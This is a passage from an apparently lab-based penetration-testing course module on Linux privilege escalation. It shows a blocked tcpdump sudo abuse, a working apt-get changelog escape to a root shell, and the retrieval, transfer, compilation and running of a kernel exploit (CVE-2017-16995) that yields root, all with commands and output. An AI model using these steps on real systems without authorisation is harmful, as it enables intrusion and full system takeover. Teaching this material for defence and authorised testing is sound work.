From the output in listing 48, we notice that only crontab jobs, tcpdump, and apt-get utilities are listed as allowing *sudo* commands.

If the **/etc/sudoers** configurations are too permissive, a user could abuse the short-lived administrative right to obtain permanent root access.

Since the first of the three permitted commands does not allow us to edit any crontab, it's unlikely that we could use this to find any escalation route. The second command looks more promising, so let's browse [GTFObins](https://gtfobins.github.io/gtfobins/tcpdump/#sudo) for suggestions on how to abuse it.

Running the hinted commands, however, reveals an unexpected outcome:

```
joe@debian-privesc:~$ COMMAND='id'
joe@debian-privesc:~$ TF=$(mktemp)
joe@debian-privesc:~$ echo "$COMMAND" > $TF
joe@debian-privesc:~$ chmod +x $TF
joe@debian-privesc:~$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
[sudo] password for joe:
dropped privs to root
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
...
compress_savefile: execlp(/tmp/tmp.c5hrJ5UrsF, /dev/null) failed: Permission denied
```

> Listing 49 - Attempting to abuse tcpdump sudo permissions

Surprisingly, once we've executed the suggested command-set, we are prompted with a "permission denied" error message.

To further investigate the culprit, we can inspect the **syslog** file for any occurrence of the *tcpdump* keyword.

```
joe@debian-privesc:~$ cat /var/log/syslog | grep tcpdump
...
Aug 29 02:52:14 debian-privesc kernel: [ 5742.171462] audit: type=1400 audit(1661759534.607:27): apparmor="DENIED" operation="exec" profile="/usr/sbin/tcpdump" name="/tmp/tmp.c5hrJ5UrsF" pid=12280 comm="tcpdump" requested_mask="x" denied_mask="x" fsuid=0 ouid=1000
```

> Listing 50 - Inspecting the syslog file for 'tcpdump' related events

The output in Listing 50 shows that the [*audit*](https://man7.org/linux/man-pages/man8/auditd.8.html) daemon has logged our privilege escalation attempt. Closer inspection reveals that [*AppArmor*](https://apparmor.net/) was triggered and blocked us.

AppArmor is a kernel module that provides mandatory access control (MAC) on Linux systems by running various application-specific profiles, and it's enabled by default on Debian 10. We can verify AppArmor's status as the *root* user using the **aa-status** command.

```
joe@debian-privesc:~$ su - root
Password:
root@debian-privesc:~# aa-status
apparmor module is loaded.
20 profiles are loaded.
18 profiles are in enforce mode.
   /usr/bin/evince
   /usr/bin/evince-previewer
   /usr/bin/evince-previewer//sanitized_helper
   /usr/bin/evince-thumbnailer
   /usr/bin/evince//sanitized_helper
   /usr/bin/man
   /usr/lib/cups/backend/cups-pdf
   /usr/sbin/cups-browsed
   /usr/sbin/cupsd
   /usr/sbin/cupsd//third_party
   /usr/sbin/tcpdump
...
2 profiles are in complain mode.
   libreoffice-oopslash
   libreoffice-soffice
3 processes have profiles defined.
3 processes are in enforce mode.
   /usr/sbin/cups-browsed (502)
   /usr/sbin/cupsd (654)
   /usr/lib/cups/notifier/dbus (658) /usr/sbin/cupsd
0 processes are in complain mode.
0 processes are unconfined but have a profile defined.
```

> Listing 51 - Verifying AppArmor status

Listing 51 confirms that tcpdump is actively protected with a dedicated AppArmor profile.

Since the first two commands from the **sudoers** file did not work, let's examine the third allowed *sudo* command: *apt-get*. Returning to [GTFOBins](https://gtfobins.github.io/gtfobins/apt-get/#sudo), we'll select the first option (a). The payload first runs the changelog *apt-get* command option, invoking the *less* application from which we can execute a bash shell.

```
sudo apt-get changelog apt
!/bin/sh
```

> Listing 52 - 'Apt-get' privilege escalation payload

We can try the above commands as the *joe* user by copying them in our active shell.

```
joe@debian-privesc:~$ sudo apt-get changelog apt
...
Fetched 459 kB in 0s (39.7 MB/s)
# id
uid=0(root) gid=0(root) groups=0(root)
```

> Listing 53 - Obtaining a root shell by abusing sudo permissions

Excellent! We managed to obtain a privileged *root* shell by abusing a misconfigured sudo configuration.

In the final section, we'll learn how to enumerate Linux kernel exploits and investigate how to elevate privileges through them.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Abusing Sudo - VM #1

Linux Privilege Escalation - Abusing Sudo - VM #2

#### Labs

1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which kernel modules enforce MAC policies to further protect the system?

Answer

2. Connect to VM 2 and gain a root shell by abusing a *sudo* misconfiguration.

Answer

## 18.4.3. Exploiting Kernel Vulnerabilities

Kernel exploits are an excellent way to escalate privileges, but our success may depend on matching not only the target's kernel version, but also the operating system flavor, such as Debian, RHEL, Gentoo, etc.

To demonstrate this attack vector, we will first gather information about our Ubuntu target by inspecting the **/etc/issue** file. As discussed earlier in the Module, this is a system text file that contains a message or system identification to be printed before the login prompt on Linux machines.

```
joe@ubuntu-privesc:~$ cat /etc/issue
Ubuntu 16.04.4 LTS \n \l
```

> Listing 55 - Gathering general information on the target system

Next, we will inspect the kernel version and system architecture using standard system commands:

```
joe@ubuntu-privesc:~$ uname -r 
4.4.0-116-generic

joe@ubuntu-privesc:~$ arch 
x86_64
```

> Listing 56 - Gathering kernel and architecture information from our Linux target

Our target system appears to be running Ubuntu 16.04.3 LTS (kernel 4.4.0-116-generic) on the x86\_64 architecture. Armed with this information, we can use [**searchsploit**](https://www.exploit-db.com/searchsploit) on our local Kali system to find kernel exploits matching the target version. We want to use "linux kernel Ubuntu 16 Local Privilege Escalation" as our main keywords. We also want to filter out some clutter from the output, so we'll exclude anything below kernel version 4.4.0 and anything that matches kernel version 4.8.

```
kali@kali:~$ searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation| linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation                       | linux_x86/local/42276.c
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)                                                                      | linux/local/39166.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                                                           | linux/local/40759.rb
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation                                                   | linux_x86-64/local/40049.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                                              | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation                                                                    | linux/local/40489.txt
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)                                                                 | linux_x86/local/15916.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                                             | linux/local/45010.c
```

> Listing 57 - Using searchsploit to find privilege escalation exploits for our target

Let's try the last exploit (**linux/local/45010.c**), since it seems to be newer and matches our kernel version as it targets any version below 4.13.9.

We'll use [**gcc**](https://gcc.gnu.org/) on Linux to compile our exploit, keeping in mind that when compiling code, we must match the architecture of our target. This is especially important in situations where the target machine does not have a compiler, and we are forced to compile the exploit on our attacking machine or in a sandboxed environment that replicates the target OS and architecture.

Although learning every detail of a Linux kernel exploit is outside the scope of this Module, we still need to understand the initial compilation instructions. To do so, let's copy the exploit into our Kali home folder and then inspect the first 20 lines of it to spot any compilation instructions.

```
kali@kali:~$ cp /usr/share/exploitdb/exploits/linux/local/45010.c .

kali@kali:~$ head 45010.c -n 20
/*
  Credit @bleidl, this is a slight modification to his original POC
  https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

  For details on how the exploit works, please visit
  https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

  Tested on Ubuntu 16.04 with the following Kernels
  4.4.0-31-generic
  4.4.0-62-generic
  4.4.0-81-generic
  4.4.0-116-generic
  4.8.0-58-generic
  4.10.0.42-generic
  4.13.0-21-generic

  Tested on Fedora 27
  4.13.9-300
  gcc cve-2017-16995.c -o cve-2017-16995
  internet@client:~/cve-2017-16995$ ./cve-2017-16995
```

> Listing 58 - Identifying the exploit source code instructions.

Luckily, to compile the source code into an executable, we just need to invoke **gcc** and specify the C source code and the output filename. To simplify this process, we could also rename the source filename to match the one expected by the exploit's procedure. Once renamed, we can simply paste the original exploit's instructions to compile the C code.

```
kali@kali:~$ mv 45010.c cve-2017-16995.c
```

> Listing 59 - Renaming the Exploit

To make sure that the compilation process goes as smooth as possible, we take advantage of the fact that our target is already shipped with GCC. For this reason, we can compile and run the exploit on the target itself. Because of this we can take advantage of including the correct version of the libraries required by the target's architecture. This setup will lower the risks related to any cross-compilation compatibility issues. To begin with, we transfer the exploit source code over the target machine via the SCP tool.

```
kali@kali:~$ scp cve-2017-16995.c joe@192.168.123.216:
```

> Listing 60 - Transferring the source code to the target machine

Once transferred, we connect to the target machine and invoke GCC to compile the exploit, providing the source code as the first argument and the binary name as the output file to the **\-o** parameter.

```
joe@ubuntu-privesc:~$ gcc cve-2017-16995.c -o cve-2017-16995
```

> Listing 61 - Compiling the Exploit on the target machine

We can safely assume gcc compiled it correctly since it did not output any errors.

Using the **file** utility, we can also inspect the Linux ELF file architecture.

```
joe@ubuntu-privesc:~$ file cve-2017-16995
cve-2017-16995: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=588d687459a0e60bc6cb984b5180ec8c3558dc33, not stripped
```

> Listing 62 - Examining the exploit binary file's architecture

With all the prerequisites in place we are now ready to run our Linux kernel privilege escalation exploit.

```
joe@ubuntu-privesc:~$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88007bd1f100
[*] Leaking sock struct from ffff880079bd9c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880075c11e40
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff880075c11e40
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),1001(joe)
#
```

> Listing 54 - Obtaining a root shell via kernel exploitation

Great! We managed to obtain a root shell by exploiting a known kernel vulnerability.

In this section, we learned how to manually enumerate our target for any known kernel vulnerabilities. We then discovered how to feed searchsploit our information to select the right exploit source code. Finally, we compiled the exploit and ran it against the target machine to gain an administrative shell.

## Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #1

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #2

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #3

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #4

Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #5

#### Labs

1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. What is the name of the compiler used to generate the exploit's executable file?

Answer

2. **Capstone Lab**: Connect to VM 2 with the provided credentials and gain a root shell by abusing a different kernel vulnerability.

Answer

3. **Capstone Lab**: Connect to the VM 3 with the provided credentials and use an appropriate privilege escalation technique to gain a root shell and read the flag.

Answer

4. **Capstone Lab**: On the Module Exercise VM 4, use another appropriate privilege escalation technique to gain access to root and read the flag. Take a closer look at file permissions.

Answer

5. **Capstone Lab**: Again, use an appropriate privilege escalation technique to gain access to root and read the flag on the Module Exercise VM 5. Binary flags and custom shell are what to look for.

Answer

## 18.5. Wrapping Up

In this Module, we covered many concepts surrounding Linux privilege escalation. We explored both manual and automated enumeration techniques that reveal required information for these types of attacks. We also examined how to gain administrative access via unprotected credentials, insecure file permissions, and binary flags. We concluded by learning how to enumerate for kernel vulnerabilities and find matching exploits.